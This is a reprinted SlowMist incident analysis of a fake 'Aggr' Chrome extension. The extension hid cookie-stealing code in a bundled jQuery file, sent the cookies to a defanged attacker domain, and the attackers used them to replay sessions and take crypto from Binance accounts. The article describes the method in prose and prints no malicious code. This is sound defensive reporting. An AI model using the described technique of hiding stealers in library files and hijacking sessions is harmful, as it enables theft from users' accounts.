Background

On March 1, 2024, according to Twitter user @doomxbt, there was an abnormal situation with their Binance account, with funds suspected to have been stolen:

(https://x.com/doomxbt/status/1763237654965920175)

Initially, this incident didn’t attract much attention. However, on May 28, 2024, Twitter user @Tree_of_Alpha analyzed and found that the victim, @doomxbt, likely installed a malicious Aggr extension from the Chrome Web Store, which had many positive reviews (we didn’t directly confirm with the victim)! This extension can steal all cookies from websites visited by users, and two months ago, someone paid influential individuals to promote it.

(https://x.com/Tree_of_Alpha/status/1795403185349099740)

In the past few days, the attention on this incident has increased. Credentials of victims logging in were stolen, and subsequently, hackers managed to steal cryptocurrency assets from the victims by brute-forcing. Many users have consulted the SlowMist security team regarding this issue. Next, we will analyze this attack event in detail to sound the alarm for the crypto community.

Analysis

Firstly, we need to find this malicious extension. Although Google has already removed the malicious extension, we can still access some historical data through snapshot information.

After downloading and analyzing the extension, we found several JS files in the directory: background.js, content.js, jquery-3.6.0.min.js, and jquery-3.5.1.min.js.

During static analysis, we observed that background.js and content.js do not contain overly complex code, nor do they have any obvious suspicious code logic. However, in background.js, we found a link to a website, and the plugin collects data and sends it to https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

By analyzing the manifest.json file, we can see that background.js uses /jquery/jquery-3.6.0.min.js, and content.js uses /jquery/jquery-3.5.1.min.js. Let’s focus on analyzing these two jQuery files.

We have discovered suspicious malicious code in jquery/jquery-3.6.0.min.js. The code processes browser cookies into JSON format and sends them to the site: https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

After static analysis, in order to more accurately analyze the behavior of the malicious extension in sending data, we begin by installing and debugging the extension. (Note: Analysis should be conducted in a completely new testing environment where no accounts are logged in, and the malicious site should be changed to a controlled one to avoid sending sensitive data to the attacker’s server.)

Once the malicious extension is installed in the testing environment, open any website, such as google.com, and observe the network requests made by the malicious extension in the background. We observed that the cookies data from Google is being sent to an external server.

We also observed the cookies data sent by the malicious extension on the Weblog service.

At this point, if attackers gain access to user authentication, credentials, etc., and utilize browser extension cookie hijacking, they can conduct a replay attack on certain trading websites, stealing users’ cryptocurrency assets.

Let’s analyze the malicious link again: https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

Domain involved: aggrtrade-extension[.]com

Parse the domain name information in the above picture:

.ru indicates that it is likely a typical user from the Russian-speaking region, suggesting a high probability of involvement by Russian or Eastern European hacker groups.

Attack Timeline:

Analyzing the malicious website mimicking AGGR (aggr.trade), aggrtrade-extension[.]com, we discovered that hackers began planning the attack three years ago.

4 months ago, hackers deployed the attack:

According to the InMist threat intelligence cooperation network, we found that the hacker’s IP is located in Moscow, utilizing a VPS provided by srvape.com. Their email is aggrdev@gmail.com.

After successfully deploying, the hacker began promoting on Twitter, waiting for unsuspecting victims to fall into the trap. As for the rest of the story, it’s well-known – some users installed the malicious extension and subsequently fell victim to theft.

The following image is AggrTrade’s official warning:

Summary

The SlowMist security team advises all users that the risk of browser extensions is nearly as significant as running executable files directly. Therefore, it’s crucial to carefully review before installing. Also, be cautious of those who send you private messages. Nowadays, hackers and scammers often impersonate legitimate and well-known projects, claiming to offer sponsorship or promotion opportunities, targeting content creators for scams. Finally, when navigating the blockchain’s dark forest, always maintain a skeptical attitude to ensure that what you install is secure and not susceptible to exploitation by hackers.

Statement:

1. This article is reproduced from [慢雾科技], the original title is “Wolf in Sheep’s Clothing | Fake Chrome Extension Theft Analysis”, the copyright belongs to the original author [Mountain&Thinking@Slow Mist Security Team], if you have any objection to the reprint, please contact Gate Learn Team, the team will handle it as soon as possible according to relevant procedures.

2. Disclaimer: The views and opinions expressed in this article represent only the author’s personal views and do not constitute any investment advice.

3. Other language versions of the article are translated by the Gate Learn team, not mentioned in Gate.io, the translated article may not be reproduced, distributed or plagiarized.